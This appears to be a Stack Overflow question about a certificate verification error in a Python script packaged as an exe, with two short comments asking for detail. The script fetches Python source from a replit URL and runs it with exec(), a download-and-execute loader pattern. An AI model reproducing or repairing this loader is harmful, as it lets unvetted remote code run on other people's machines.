# how to fix this : "CERTIFICATE_VERIFY_FAILED"?

Tags: python, verify, certifi

i was convert my python file to a exe for my friend to use. It working smoothly but after i reinstall my windows it wont working anymore. Heres the source :

```
import urllib.request
import io
import ctypes

def set_window_title(title):
    ctypes.windll.kernel32.SetConsoleTitleW(title)

set_window_title("MCC Downloader/Installer")

url = "https://loaderfixed.hcjtnnsfdnhjnd.repl.co/main.py"


response = urllib.request.urlopen(url)
code = response.read().decode()


exec(code)
```

I tried edit the source on replit. But i guess the problem is on the exe.

Im pretty sure this thing still working on almost all other pc. Heres the error : [Error](https://i.stack.imgur.com/dFhw4.png)

Comment: Do not share text as image. Moreover, provide some code. A mechanic cannot fix your car if you come to the garage without the car.

Comment: Please provide enough code so others can better understand or reproduce the problem.